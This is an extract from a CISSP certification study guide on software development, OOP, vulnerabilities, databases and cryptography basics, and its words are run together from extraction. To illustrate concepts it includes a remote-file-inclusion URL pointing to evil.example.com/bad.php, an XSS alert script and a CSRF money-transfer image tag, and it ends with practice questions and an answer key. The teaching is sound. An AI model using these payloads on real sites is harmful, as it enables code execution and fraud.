APPLICATION DEVELOPMENT METHODS

Assoftwarehasgrownincomplexity,softwareprogramminghas
increasinglybecomeateameort.Teambasedprojectsrequireproject
management:providingaprojectframeworkwithdeliverablesand
milestones,divvyinguptasks,teamcommunication,progressevaluationand
reporting,and(hopefully)analdeliveredproduct.
Waterfall Model

TheWaterfallModelisalinearapplicationdevelopmentmodelthatusesrigid
phases;whenonephaseends,thenextbegins.Stepsoccurinsequence,and
theunmodiedWaterfallModeldoesnotallowdeveloperstogobackto

previoussteps.Itiscalledthewaterfallbecauseitsimulateswaterfalling:it
cannotgobackup.AmodiedWaterfallModelallowsareturntoaprevious
phaseforvericationorvalidation,ideallyconnedtoconnectingsteps.
Spiral

TheSpiralModelisasoftwaredevelopmentmodeldesignedtocontrolrisk.
TheSpiralModelrepeatsstepsofaproject,startingwithmodestgoalsand
expandingoutwardineverwiderspirals(calledrounds).Eachroundofthe
spiralconstitutesaproject,andeachroundmayfollowtraditionalsoftware
developmentmethodologysuchasmodiedwaterfall.Ariskanalysisis
performedeachround.Fundamentalawsintheprojectorprocessaremore
likelytobediscoveredintheearlierphases,resultinginsimplerxes.This
lowerstheoverallriskoftheproject:largerisksshouldbeidentiedand
mitigated.
Agile So ware Development

AgileSoftwareDevelopmentevolvedasareactiontorigidsoftware
developmentmodelssuchastheWaterfallModel.Agilemethodsinclude
ExtremeProgramming(XP).Agileembodiesmanymoderndevelopment
concepts,includingmoreexibility,fastturnaroundwithsmallermilestones,
strongcommunicationwithintheteam,andmorecustomerinvolvement.
Extreme Programming

ExtremeProgramming(XP)isanAgiledevelopmentmethodthatusespairs
ofprogrammerswhoworkoadetailedspecication.Thereisahighlevelof
customerinvolvementandconstantcommunication.
Rapid Application Development

RapidApplicationDevelopment(RAD)rapidlydevelopssoftwareviatheuseof
prototypes,dummyGUIs,backenddatabases,andmore.ThegoalofRAD
isquicklymeetingthebusinessneedofthesystem;technicalconcernsare
secondary.Thecustomerisheavilyinvolvedintheprocess.
SDLC

TheSystemsDevelopmentLifeCycle(SDLC,alsocalledthesoftwaredevelopment
lifecycleorsimplythesystemlifecycle)isasystemdevelopmentmodel.SDLC
isusedacrosstheindustry,butSDLCfocusesonsecuritywhenusedin
contextoftheexam.ThinkofourSDLCasthesecuresystemsdevelopment

lifecycle:thesecurityisimplied.

FastFacts
ThefollowingoverviewissummarizedfromNISTSP80014:
Prepareasecurityplan:Ensurethatsecurityisconsideredduringall
phasesoftheITsystemlifecycleandthatsecurityactivitiesare
accomplishedduringeachofthephases.
Initiation:Theneedforasystemisexpressedandthepurposeofthe
systemisdocumented.
Conductasensitivityassessment:Lookatthesecuritysensitivityofthe
systemandtheinformationtobeprocessed.
Development/acquisition:Thesystemisdesigned,purchased,
programmed,ordeveloped.
Determinesecurityrequirements:Determinetechnicalfeatures(like
accesscontrols),assurances(likebackgroundchecksforsystem
developers),oroperationalpractices(likeawarenessandtraining).
Incorporatesecurityrequirementsintospecications:Ensurethatthe
previouslygatheredinformationisincorporatedintheprojectplan.
Obtainthesystemandrelatedsecurityactivities:Mayinclude
developingthesystemssecurityfeatures,monitoringthedevelopment
processitselfforsecurityproblems,respondingtochanges,and
monitoringthreats.
Implementation:Thesystemistestedandinstalled.
Install/turnoncontrols:Asystemoftencomeswithsecurityfeatures
disabled.Theseneedtobeenabledandcongured.
Securitytesting:Usedtocertifyasystemandmayincludetesting
securitymanagement,physicalfacilities,personnel,procedures,theuseof
commercialorinhouseservices(suchasnetworkingservices),and

contingencyplanning.
Accreditation:Theformalauthorizationbytheaccrediting
(management)ocialforsystemoperationandanexplicitacceptanceof
risk.
Operation/maintenance:Thesystemismodiedbytheadditionof
hardwareandsoftwareandbyotherevents.
Securityoperationsandadministration:Examplesincludebackups,
training,managingcryptographickeys,useradministration,andpatching.
Operationalassurance:Examineswhetherasystemisoperated
accordingtoitscurrentsecurityrequirements.
Auditsandmonitoring:Asystemauditisaonetimeorperiodiceventto
evaluatesecurity.Monitoringreferstoanongoingactivitythatexamines
eitherthesystemortheusers.
Disposal:Thesecuredecommissionofasystem.
Information:Informationmaybemovedtoanothersystem,archived,
discarded,ordestroyed.
Mediasanitization:Therearethreegeneralmethodsofpurgingmedia:
overwriting,degaussing(formagneticmediaonly),anddestruction.
1

GenerallyAcceptedPrinciplesandPracticesforSecuringInformation

TechnologySystems.h p://csrc.nist.gov/publications/nistpubs/80014/800
14.pdf[accessedJune26,2013].

OBJECT-ORIENTED PROGRAMMING
ObjectOrientedProgramming(OOP)usesanobjectmetaphortodesignand
writecomputerprograms.Anobjectisablackboxthatisabletoperform
functionsandsendsandreceivesmessages.Objectscontaindataandmethods
(thefunctionstheyperform).Theobjectprovidesencapsulation(alsocalled
datahiding):wedonotknow,fromtheoutside,howtheobjectperformsits

function.Thisprovidessecuritybenets:usersshouldnotbeexposedto
unnecessarydetails.
Cornerstone Object-Oriented Programming concepts

CornerstoneObjectOrientedProgrammingconceptsincludeobjects,
methods,messages,inheritance,delegation,polymorphism,and
polyinstantiation.WewilluseanexampleobjectcalledAddytoillustrate
thecornerstoneconcepts.Addyisanobjectthataddstwointegers;itisan
extremelysimpleobject,buthasenoughcomplexitytoexplaincoreOOP
concepts.Addyinheritsanunderstandingofnumbersandmathfromhis
parentclass(theclassiscalledmathematicaloperators).Onespecicobjectis
calledaninstance.Notethatobjectsmayinheritfromotherobjects,inaddition
toclasses.
Inourcase,theprogrammersimplyneedstoprogramAddytosupportthe
methodofaddition(inheritancetakescareofeverythingelseAddymust
know).Figure4.1showsAddyaddingtwonumbers.

FIGURE4.1 TheAddyobject.

1+2istheinputmessage;3istheoutputmessage.Addyalsosupports
delegation:ifhedoesnotknowhowtoperformarequestedfunction,hecan
delegatethatrequesttoanotherobject(calledSubbyinFigure4.2).

FIGURE4.2 Delegation.

Addyalsosupportspolymorphism(basedontheGreekrootspolyand
morph,meaningmanyandforms,respectively):hehastheabilityto
overloadhisplus(+)operator,performingdierentmethodsdependingon
thecontextoftheinputmessage.Forexample,Addyaddswhentheinput
messagecontainsnumber+number;polymorphismallowsAddyto
concatenatetwostringswhentheinputmessagecontainsstring+string,as

showninFigure4.3.

FIGURE4.3 Polymorphism.

Finally,polyinstantiationinvolvesmultipleinstances(specicobjects)with
thesamenamesthatcontaindierentdata.Thismaybeusedinmultilevel
secureenvironmentstokeeptopsecretandsecretdataseparate,forexample.
Figure4.4showspolyinstantiatedAddyobjects:twoobjectswiththesame
namebutdierentdata.Notethatthesearetwoseparateobjects.Also,toa
secretclearedsubject,theAddyobjectwithsecretdataistheonlyknown
Addyobject.

FastFacts
HereisasummaryofObjectOrientedProgrammingconceptsillustrated
byAddy:
Object:Addy
Class:Mathematicaloperators
Method:Addition
Inheritance:Addyinheritsanunderstandingofnumbersandmathfrom
hisparentclassmathematicaloperators.Theprogrammersimplyneedsto
programAddytosupportthemethodofaddition
Exampleinputmessage:1+2
Exampleoutputmessage:3
Polymorphism:Addycanchangebehaviorbasedonthecontextofthe
input,overloadingthe+toperformaddition,orconcatenation,
dependingonthecontext

Polyinstantiation:TwoAddyobjects(secretandtopsecret),with
dierentdata

FIGURE4.4 Polyinstantiation.

Object Request Brokers

Aswehaveseenpreviously,matureobjectsaredesignedtobereused:they
lowerriskanddevelopmentcosts.ObjectRequestBrokers(ORBs)canbeused
tolocateobjects:theyactasobjectsearchengines.ORBsaremiddleware:they
connectprogramstoprograms.CommonobjectbrokersincludedCOM,
DCOM,andCORBA.
COM and DCOM

TwoobjectbrokertechnologiesbyMicrosoftareCOM(ComponentObject
Model)andDCOM(DistributedComponentObjectModel).COMlocatesobjects
onalocalsystem;DCOMcanalsolocateobjectsoveranetwork.
COMallowsobjectswri enwithdierentOOPlanguagestocommunicate,
whereobjectswri eninC++sendmessagestoobjectswri eninJava,for
example.Itisdesignedtohidethedetailsofanyindividualobjectandfocuses
ontheobjectscapabilities.
DCOMisanetworkedsequeltoCOM:MicrosoftDistributedCOM
(DCOM)extendstheComponentObjectModel(COM)tosupport
communicationamongobjectsondierentcomputersonaLAN,aWAN,or
eventheInternet.WithDCOM,yourapplicationcanbedistributedat
locationsthatmakethemostsensetoyourcustomerandtotheapplication.
2

DCOMincludesObjectLinkingandEmbedding(OLE),awaytolink

documentstootherdocuments.

BothCOMandDCOMarebeingsupplantedbyMicrosoft.NET,whichcan
interoperatewithDCOMbutoersadvancedfunctionalitytobothCOMand
DCOM.

SOFTWARE VULNERABILITIES, TESTING, AND ASSURANCE

Oncetheprojectisunderwayandsoftwarehasbeenprogrammed,thenext
stepsaretestingthesoftware,focusingonthecondentiality,integrity,and
availabilityofthesystem,theapplication,andthedataprocessedbythe
application.Specialcaremustbegiventothediscoveryofsoftware
vulnerabilitiesthatcouldleadtodataorsystemcompromise.Finally,
organizationsneedtobeabletogaugetheeectivenessoftheirsoftware
creationprocessandidentifywaystoimproveit.
So ware vulnerabilities

Programmersmakemistakes:thishasbeentruesincetheadventofcomputer
programming.Thenumberofaveragedefectsperlineofsoftwarecodecan
oftenbereduced,thoughnoteliminated,byimplementingmaturesoftware
developmentpractices.
Types of so ware vulnerabilities

Thissectionwillbrieydescribecommonapplicationvulnerabilities.An
additionalsourceofuptodatevulnerabilitiescanbefoundat2011
CWE/SANSTop25MostDangerousProgrammingErrors,availableat
h p://cwe.mitre.org/top25/;thefollowingsummaryisbasedonthislist.CWE
referstoCommonWeaknessEnumeration,adictionaryofsoftware
vulnerabilitiesbyMITRE(seeh p://cwe.mitre.org/).SANSistheSANS
Institute;seeh p://www.sans.org.
Hardcodedcredentials:Backdoorusername/passwordsleftby
programmersinproductioncode
Bueroverow:Occurswhenaprogrammerdoesnotperformvariable
boundschecking
SQLinjection:ManipulationofabackendSQLserverviaafrontendWeb
server
Directorypathtraversal:EscapingfromtherootofaWebserver(such

as/var/www)intotheregularlesystembyreferencingdirectoriessuchas
../..
PHPRemoteFileInclusion(RFI):AlteringnormalPHPURLsandvariables
suchash p://good.example.com?le=readme.txttoincludeandexecute
remotecontent,suchash p://good.example.com?
le=h p://evil.example.com/bad.php
CrossSiteScripting(XSS):ThirdpartyinjectionofascriptintoaWebpage
withinthesecuritycontextofatrustedsite
CrossSiteRequestForgery(CSRForsometimesXSRF):Thirdparty
submissionofpredictablecontenttoaWebapplicationwithinthesecurity
contextofanauthenticateduser

Cross-Site Scripting and Cross-Site Request Forgery

CrossSiteScriptingandCrossSiteRequestForgeryareoftenconfused.They
arebothWeba acks:thedierenceisXSSexecutesascriptinatrusted
context:

<script>alert(XSS Test!);</script>

ThepreviouscodewouldpopupaharmlessXSSTest!alert.Areala ack
wouldincludemoreJavaScript,oftenstealingcookiesorauthentication
credentials.
CSRFoftentricksauserintoprocessingaURL(sometimesbyembeddingthe
URLinanHTMLimagetag)thatperformsamaliciousact,forexample,
trickingawhitehatintorenderingthefollowingimagetag:
<img src=https://bank.example.com/transfer-money?
from=WHITEHAT&to=BLACKHAT>
Privilege escalation

Privilegeescalationvulnerabilitiesallowana ackerwith(typicallylimited)
accesstobeabletoaccessadditionalresources.Impropersoftware
congurationsandpoorcodingandtestingpracticesoftencauseprivilege
escalationvulnerabilities.
Backdoors

Backdoors

Backdoorsareshortcutsinasystemthatallowausertobypasssecurity
checks(suchasusername/passwordauthentication).A ackerswilloften
installabackdooraftercompromisingasystem.
Disclosure

Disclosuredescribestheactionstakenbyasecurityresearcherafter
discoveringasoftwarevulnerability.Fulldisclosureisthecontroversial
practiceofreleasingvulnerabilitydetailspublicly.Responsibledisclosureisthe
practiceofprivatelysharingvulnerabilityinformationwithavendorand
withholdingpublicreleaseuntilapatchisavailable.Otheroptionsexist
betweenfullandresponsibledisclosure.
So ware Capability Maturity Model

TheSoftwareCapabilityMaturityModel(CMM)isamaturityframeworkfor
evaluatingandimprovingthesoftwaredevelopmentprocess.Carnegie
MellonUniversitys(CMU)SoftwareEngineeringInstitute(SEI)developed
themodel.ThegoalofCMMistodevelopamethodicalframeworkfor
creatingqualitysoftwarethatallowsmeasurableandrepeatableresults.

FastFacts
ThevelevelsofCMMaredescribed(see
h p://www.sei.cmu.edu/reports/93tr024.pdf):
1.Initial:Thesoftwareprocessischaracterizedasadhocandoccasionally
evenchaotic.Fewprocessesaredened,andsuccessdependson
individualeort.
2.Repeatable:Basicprojectmanagementprocessesareestablishedtotrack
cost,schedule,andfunctionality.Thenecessaryprocessdisciplineisin
placetorepeatearliersuccessesonprojectswithsimilarapplications.
3.Dened:Thesoftwareprocessforbothmanagementandengineering
activitiesisdocumented,standardized,andintegratedintoastandard
softwareprocessfortheorganization.Projectsuseanapproved,tailored
versionoftheorganizationsstandardsoftwareprocessfordevelopingand

maintainingsoftware.
4.Managed:Detailedmeasuresofthesoftwareprocessandproductquality
arecollected,analyzed,andusedtocontroltheprocess.Boththesoftware
processandproductsarequantitativelyunderstoodandcontrolled.
5.Optimizing:Continualprocessimprovementisenabledbyquantitative
feedbackfromtheprocessandfrompilotinginnovativeideasand
technologies.
4

SM

CapabilityMaturityModel forSoftware,Version1.1.

h p://www.sei.cmu.edu/reports/93tr024.pdf[accessedJune26,2013].

DATABASES
Adatabaseisastructuredcollectionofrelateddata.Databasesallowqueries
(searches),insertions(updates),deletions,andmanyotherfunctions.The
databaseismanagedbytheDatabaseManagementSystem(DBMS),which
controlsallaccesstothedatabaseandenforcesthedatabasesecurity.
DatabasesaremanagedbyDatabaseAdministrators(DBAs).Databasesmaybe
searchedwithadatabasequerylanguage,suchastheStructuredQuery
Language(SQL).Typicaldatabasesecurityissuesincludethecondentiality
andintegrityofthestoreddata.Integrityisaprimaryconcernwhen
replicateddatabasesareupdated.
Relational databases

Themostcommonmoderndatabaseistherelationaldatabase,whichcontain
twodimensionaltablesofrelated(hencethetermrelational)data.Atableis
alsocalledarelation.Tableshaverowsandcolumns:arowisadatabase
record,calledatuple;acolumniscalledana ribute.Asinglecell(intersection
ofarowandcolumn)inadatabaseiscalledavalue.Relationaldatabases
requireauniquevaluecalledtheprimarykeyineachtupleinatable.Table4.1
showsarelationaldatabaseemployeetable,sortedbytheprimarykey(SSN
orSocialSecurityNumber).

Table4.1
RelationalDatabaseEmployeeTable

Table4.1a ributesareSSN,Name,andTitle.Tuplesincludeeachrow:133
731337,343534334,etc.Gaisanexampleofavalue(cell).Candidatekeys
areanya ribute(column)inthetablewithuniquevalues:candidatekeysin
theprevioustableincludeSSNandName;SSNwasselectedastheprimary
keybecauseitistrulyunique(twoemployeescouldhavethesamename,but
notthesameSSN).Theprimarykeymayjointwotablesinarelational
database.
Foreign keys

Aforeignkeyisakeyinarelateddatabasetablethatmatchesaprimarykeyin
theparentdatabase.Notethattheforeignkeyisthelocaltablesprimarykey:
itiscalledtheforeignkeywhenreferringtoaparenttable.Table4.2istheHR
databasetablethatlistsemployeesvacationtime(indays)andsicktime(also
indays);ithasaforeignkeyofSSN.TheHRdatabasetablemaybejoinedto
theparent(employee)databasetablebyconnectingtheforeignkeyoftheHR
tabletotheprimarykeyoftheemployeetable.

Table4.2
HRDatabaseTable

Referential, semantic, and entity integrity

Databasesmustensuretheintegrityofthedatainthetables:thisiscalled
dataintegrity,discussedinSectionDatabaseintegrity.Therearethree
additionalspecicintegrityissuesthatmustbeaddressedbeyondthe
correctnessofthedataitself:referential,semantic,andentityintegrity.These
aretiedcloselytothelogicaloperationsoftheDBMS.

CrunchTime
Referentialintegritymeansthateveryforeignkeyinasecondarytable
matchesaprimarykeyintheparenttable:ifthisisnottrue,referential
integrityhasbeenbroken.Semanticintegritymeansthateacha ribute
(column)valueisconsistentwiththea ributedatatype.Entityintegrity
meanseachtuplehasauniqueprimarykeythatisnotnull.

TheHRdatabasetableshowninTable4.2,seenpreviously,hasreferential,
semantic,andentityintegrity.Table4.3,ontheotherhand,hasmultiple
problems:onetupleviolatesreferentialintegrity,onetupleviolatessemantic
integrity,andthelasttwotuplesviolateentityintegrity.

Table4.3
DatabaseTableLackingIntegrity

Thetuplewiththeforeignkey467519732hasnomatchingentryinthe
employeedatabasetable.Thisbreaksreferentialintegrity:thereisnowayto
linkthisentrytoanameortitle.CellNexus6violatessemanticintegrity:
thesicktimea ributerequiresvaluesofdays,andNexus6isnotavalid
amountofsickdays.Finally,thelasttwotuplesbothhavethesameprimary
key(primarytothistable;foreignkeytotheparentemployeestable);this
breaksentityintegrity.
Database normalization

Databasenormalizationseekstomakethedatainadatabasetablelogically
concise,organized,andconsistent.Normalizationremovesredundantdata
andimprovestheintegrityandavailabilityofthedatabase.
Database views

Databasetablesmaybequeried;theresultsofaqueryarecalledadatabase
view.Viewsmaybeusedtoprovideaconstraineduserinterface:forexample,
nonmanagementemployeescanbeshowntheirindividualrecordsonlyvia
databaseviews.Table4.4showsthedatabaseviewresultingfromquerying
theemployeetableTitlea ributewithastringofDetective.While
employeesoftheHRdepartmentmaybeabletoviewtheentireemployee
table,thisviewmaybeauthorizedforthecaptainofthedetectives,for
example.

Table4.4
EmployeeTableDatabaseViewDetective

Database query languages

Databasequerylanguagesallowthecreationofdatabasetables,read/write
accesstothosetables,andmanyotherfunctions.Databasequerylanguages
haveatleasttwosubsetsofcommands:DataDenitionLanguage(DDL)and
DataManipulationLanguage(DML).DDLisusedtocreate,modify,anddelete
tables.DMLisusedtoqueryandupdatedatastoredinthetables.
Database integrity

Inadditiontothepreviouslydiscussedrelationaldatabaseintegrityissuesof
semantic,referential,andentityintegrity,databasesmustalsoensuredata
integrity:theintegrityoftheentriesinthedatabasetables.Thistreats
integrityasamoregeneralissue:mitigatingunauthorizedmodicationsof
data.Theprimarychallengeassociatedwithdataintegritywithinadatabase
issimultaneousa emptedmodicationsofdata.Adatabaseservertypically
runsmultiplethreads(lightweightprocesses),eachcapableofalteringdata.
Whathappensiftwothreadsa empttoalterthesamerecord?
DBMSsmaya empttocommitupdates:makethependingchanges
permanent.Ifthecommitisunsuccessful,theDBMSscanrollback(alsocalled
abort)andrestorefromasavepoint(cleansnapshotofthedatabasetables).
Adatabasejournalisalogofalldatabasetransactions.Shouldadatabase
becomecorrupted,thedatabasecanberevertedtoabackupcopy,andthen,
subsequenttransactionscanbereplayedfromthejournal,restoring
databaseintegrity.
Database replication and shadowing

Databasesmaybehighlyavailable(HA),replicatedwithmultipleservers
containingmultiplecopiesoftables.Integrityistheprimaryconcernwith

replicated.
Databasereplicationmirrorsalivedatabase,allowingsimultaneousreadsand
writestomultiplereplicateddatabasesbyclients.Replicateddatabasespose
additionalintegritychallenges.Atwophase(ormultiphase)commitcanbe
usedtoassureintegrity.
Ashadowdatabaseissimilartoareplicateddatabase,withonekeydierence:
ashadowdatabasemirrorsallchangesmadetoaprimarydatabase,but
clientsdonotaccesstheshadow.Unlikereplicateddatabases,theshadow
databaseisoneway.

Summary of exam objectives

Weliveinanincreasinglycomputerizedworld,andsoftwareiseverywhere.
Thecondentiality,integrity,andavailabilityofdataprocessedbysoftware
arecritical,asisthenormalfunctionality(availability)ofthesoftwareitself.
Thisdomainhasshownhowsoftwareworksandthechallenges
programmersfacewhiletryingtowriteerrorfreecodethatisabletoprotect
data(anditself)inthefaceofa acks.
Wehaveseenthatfollowingasoftwaredevelopmentmaturitymodelsuchas
theCapabilityMaturityModel(CMM)candramaticallylowerthenumberof
errorsprogrammersmake.ThevestepsofCMMfollowtheprocessmost
programmingorganizationsfollow,fromaninformalprocesstoamature
processthatalwaysseeksimprovement:initial,repeatable,dened,managed,
andoptimizing.

TOP FIVE TOUGHEST QUESTIONS

1.Whatsoftwaredesignmethodologyusespairedprogrammers?
A.Agile
B.ExtremeProgramming(XP)
C.Sashimi
D.Scrum

2.Anobjectactsdierently,dependingonthecontextoftheinputmessage.
WhatObjectOrientedProgrammingconceptdoesthisillustrate?
A.Delegation
B.Inheritance
C.Polyinstantiation
D.Polymorphism
3.Whattypeofdatabaselanguageisusedtocreate,modify,anddelete
tables?
A.DataDenitionLanguage(DDL)
B.DataManipulationLanguage(DML)
C.DatabaseManagementSystem(DBMS)
D.StructuredQueryLanguage(SQL)
4.Adatabasecontainsanentrywithanemptyprimarykey.Whatdatabase
concepthasbeenviolated?
A.Entityintegrity
B.Normalization
C.Referentialintegrity
D.Semanticintegrity
5.Whichvulnerabilityallowsathirdpartytoredirectpredictablecontent
withinthesecuritycontextofanauthenticateduser?
A.CrossSiteRequestForgery(CSRF)
B.CrossSiteScripting(XSS)
C.PHPRemoteFileInclusion(RFI)

D.SQLInjection

SELF-TEST QUICK ANSWER KEY

1.Correctanswerandexplanation:B.AnswerBiscorrect;Extreme
Programming(XP)isanAgiledevelopmentmethodthatusespairsof
programmerswhoworkoadetailedspecication.Thereisahighlevelof
customerinvolvement.
Incorrectanswersandexplanations:A,C,andD.AnswersA,C,andDare
incorrect.Agiledescribesnumerousdevelopmentmethodologies,including
XP:XPisabe eranswerbecauseitismorespecic.SashimiisaWaterfall
Modelvariant.ScrumisadierentAgilemethodologythatusessmallteams.
2.Correctanswerandexplanation:D.AnswerDiscorrect;polymorphism
(basedontheGreekrootspolyandmorph,meaningmanyandforms,
respectively)allowstheabilitytooverloadoperators,performingdierent
methodsdependingonthecontextoftheinputmessage.
Incorrectanswersandexplanations:A,B,andC.AnswersA,B,andCare
incorrect.Delegationallowsobjectstodelegatemessagestootherobjects.
Inheritancemeansanobjectinheritscapabilitiesfromitsparentclass.
Polyinstantiationmeansmanyinstances,twoobjectswiththesamenames
thathavedierentdata.
3.Correctanswerandexplanation:A.AnswerAiscorrect;DataDenition
Language(DDL)isusedtocreate,modify,anddeletetables.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.DataManipulationLanguage(DML)isusedtocreate,modify,and
deletetables.DataManipulationLanguage(DML)isusedtoqueryand
updatedatastoredinthetables.DatabaseManagementSystem(DBMS)
managesthedatabasesystemandprovidessecurityfeatures.Structured
QueryLanguage(SQL)isadatabasequerylanguagethatincludesbothDDL
andDML.DDLismorespecicthanSQL,oritisabe eranswerforthis
question.
4.Correctanswerandexplanation:A.AnswerAiscorrect;entityintegrity
meanseachtuplehasauniqueprimarykeythatisnotnull.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.Normalizationseekstomakethedatainadatabasetablelogically
concise,organized,andconsistent.Referentialintegritymeansthatevery

foreignkeyinasecondarytablematchesaprimarykeyintheparenttable:if
thisisnottrue,referentialintegrityhasbeenbroken.Semanticintegrity
meanseacha ribute(column)valueisconsistentwiththea ributedatatype.
5.Correctanswerandexplanation:A.AnswerAiscorrect;CrossSiteRequest
Forgery(CSRF)allowsathirdpartytoredirectofstaticcontentwithinthe
securitycontextofatrustedsite.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.CrossSiteScripting(XSS)isthirdpartyexecutionofaweb
scriptinglanguage(suchasJavaScript)withinthesecuritycontextofatrusted
site.XSSissimilartoCSRF;thedierenceisXSSusesactivecode.PHP
RemoteFileInclusion(RFI)altersnormalPHPvariablestoreferenceremote
content,whichcanleadtoexecutionofmaliciousPHPcode.SQLinjection
manipulatesabackendSQLserverviaafrontendWebserver.
2

DCOMTechnicalOverview.h p://technet.microsoft.com/en

us/library/cc722925.aspx[accessedJune26,2013].
3

2011CWE/SANSTop25MostDangerousSoftwareErrors.

h p://cwe.mitre.org/top25/[accessedJune26,2013].

CHAPTER5

Domain 5: Cryptography
Abstract
Domain5:Cryptography,presentedinthischapter,presentsanotherrather
technicaldomainoftheCISSP.Thischapterpresentskeycryptographic
conceptsofauthenticationandnonrepudiationinadditiontocondentiality
andintegrity,whichareconceptspresentedinmanyofthedomains.Beyond
thefoundationaloperationssuchassubstitutionandpermutationandtypes
ofcryptosystems,symmetric,asymmetric,andhashing,thischapteralso
introduceskeymodesofoperationforsymmetriccryptosystems,Electronic
CodeBook(ECB),CipherBlockChaining(CBC),CipherFeedback(CFB),
OutputFeedback(OFB),andCounterMode(CTR).Anadditionalgoalofthis
chapterispresentingkeycharacteristicsofthosecryptographicalgorithms
mostlikelytobeseenintheCISSP.

KEYWORDS
Plaintext;Ciphertext;Cryptography;Cryptanalysis;Cryptology;Symmetric
encryption;Asymmetricencryption;Hashfunction;Digitalsignature;
Nonrepudiation

Exam Objectives in This Chapter

CornerstoneCryptographicConcepts
SymmetricEncryption
AsymmetricEncryption
HashFunctions

CryptographicA acks
ImplementingCryptography

Introduction
Cryptographyissecretwriting:securecommunicationthatmaybe
understoodbytheintendedrecipientonly.Whilethefactthatdataisbeing
transmi edmaybeknown,thecontentofthatdatashouldremainunknown
tothirdparties.Datainmotion(movingonanetwork)andatrest(storedon
adevicesuchasadisk)maybeencrypted.

CORNERSTONE CRYPTOGRAPHIC CONCEPTS

Fundamentalcryptographicconceptsareembodiedbyallstrongencryption
andmustbeunderstoodbeforelearningaboutspecicimplementations.
Key terms

Cryptologyisthescienceofsecurecommunications.Cryptographycreates
messageswhosemeaningishidden;cryptanalysisisthescienceofbreaking
encryptedmessages(recoveringtheirmeaning).Manyusetheterm
cryptographyinplaceofcryptology:itisimportanttorememberthat
cryptologyencompassesbothcryptographyandcryptanalysis.
Acipherisacryptographicalgorithm.Aplaintextisanunencryptedmessage.
Encryptionconvertstheplaintexttoaciphertext.Decryptionturnsaciphertext
backintoaplaintext.
Confidentiality, integrity, authentication, and nonrepudiation

Cryptographycanprovidecondentiality(secretsremainsecret)and
integrity(dataisnotalteredinanunauthorizedmanner):itisimportantto
notethatitdoesnotdirectlyprovideavailability.Cryptographycanalso
provideauthentication(provinganidentityclaim).
Additionally,cryptographycanprovidenonrepudiation,whichisanassurance
thataspecicuserperformedaspecictransactionandthatthetransaction
didnotchange.
Substitution and permutation

Cryptographicsubstitutionreplacesonecharacterforanother;thisprovides

confusion.Permutation(alsocalledtransposition)providesdiusionby
rearrangingthecharactersoftheplaintext,anagramstyle.
ATTACKATDAWNcanberearrangedtoCAAKDTANTATW,for
example.Substitutionandpermutationareoftencombined.

D i d Yo u K n o w ?
Strongencryptiondestroyspa erns.Ifasinglebitofplaintextchanges,
theoddsofeverybitofresultingciphertextchangingshouldbe50/50.
Anysignsofnonrandomnessmaybeusedascluestoacryptanalyst,
hintingattheunderlyingorderoftheoriginalplaintextorkey.

Cryptographic strength

Goodencryptionisstrong:forkeybasedencryption,itshouldbevery
dicult(andideallyimpossible)toconvertaciphertextbacktoaplaintext
withoutthekey.Theworkfactordescribeshowlongitwilltaketobreaka
cryptosystem(decryptaciphertextwithoutthekey).
Secrecyofthecryptographicalgorithmdoesnotprovidestrength:infact
secretalgorithmsareoftenprovenquiteweak.Strongcryptoreliesonmath,
notsecrecy,toprovidestrength.Ciphersthathavestoodthetestoftimeare
publicalgorithms,suchastheTripleDataEncryptionStandard(TDES)andthe
AdvancedEncryptionStandard(AES).
Monoalphabetic and polyalphabetic ciphers

Amonoalphabeticcipherusesonealphabet:aspecicle er(likeE)is
substitutedforanother(likeX).Apolyalphabeticcipherusesmultiple
alphabets:EmaybesubstitutedforXoneroundandthenSthenext
round.
Monoalphabeticciphersaresusceptibletofrequencyanalysis.Polyalphabetic
ciphersa empttoaddressthisissueviatheuseofmultiplealphabets.
Exclusive Or (XOR)

ExclusiveOr(XOR)isthesecretsaucebehindmodernencryption.

CombiningakeywithaplaintextviaXORcreatesaciphertext.XORingto
samekeytotheciphertextrestorestheoriginalplaintext.XORmathisfast
andsimple.
Twobitsaretrue(or1)ifoneortheother(exclusively,notboth)is1.Inother
words,iftwobitsaredierent,theansweris1(true).Iftwobitsarethesame,
theansweris0(false).XORusesatruthtable,showninTable5.1.Thisdictates
howtocombinethebitsofakeyandplaintext.
Table5.1
XORTruthTable

Types of cryptography

Therearethreeprimarytypesofmodernencryption:symmetric,asymmetric,
andhashing.Symmetricencryptionusesonekey:thesamekeyencryptsand
decrypts.Asymmetriccryptographyusestwokeys:ifyouencryptwithone
key,youmaydecryptwiththeother.Hashingisaonewaycryptographic
transformationusinganalgorithm(andnokey).
Cryptographicprotocolgovernancedescribestheprocessofselectingtheright
method(cipher)andimplementationfortherightjob,typicallyatan
organizationwidescale.Forexample,adigitalsignatureprovides
authenticationandintegrity,butnotcondentiality.Symmetricciphersare
primarilyusedforcondentiality,andAESispreferableoverDESdueto
strengthandperformancereasons(whichwewillalsodiscusslater).

SYMMETRIC ENCRYPTION
Symmetricencryptionusesonekeytoencryptanddecrypt.Ifyouencrypta
zipleandthendecryptwiththesamekey,youareusingsymmetric
encryption.Symmetricencryptionisalsocalledsecretkeyencryption:the

keymustbekeptsecretfromthirdparties.Strengthsincludespeedand
cryptographicstrengthperbitofkey.Themajorweaknessisthatthekey
mustbesecurelysharedbeforetwopartiesmaycommunicatesecurely.
Symmetrickeysareoftensharedviaanoutofbandmethod,suchasviaface
tofacediscussion.
Stream and block ciphers

Symmetricencryptionmayhavestreamandblockmodes.Streammode
meanseachbitisindependentlyencryptedinastream.Blockmodeciphers
encryptblocksofdataeachround:56bitsfortheDataEncryptionStandard
(DES)and128,192,or256bitsforAES,forexample.Someblockcipherscan
emulatestreamciphersbyse ingtheblocksizeto1bit;theyarestill
consideredblockciphers.
Initialization vectors and chaining

Aninitializationvectorisusedinsomesymmetriccipherstoensurethatthe
rstencryptedblockofdataisrandom.Thisensuresthatidenticalplaintexts
encrypttodierentciphertexts.Also,asBruceSchneiernotesinApplied
Cryptography,Evenworse,twomessagesthatbeginthesamewillencrypt
thesamewayuptotherstdierence.Somemessageshaveacommon
header:ale erhead,oraFromline,orwhatever.

Initializationvectors

solvethisproblem.
Chaining(calledfeedbackinstreammodes)seedsthepreviousencryptedblock
intothenextblocktobeencrypted.Thisdestroyspa ernsintheresulting
ciphertext.DESElectronicCodeBookmode(seebelow)doesnotusean
initializationvectororchainingandpa ernscanbeclearlyvisibleinthe
resultingciphertext.
DES

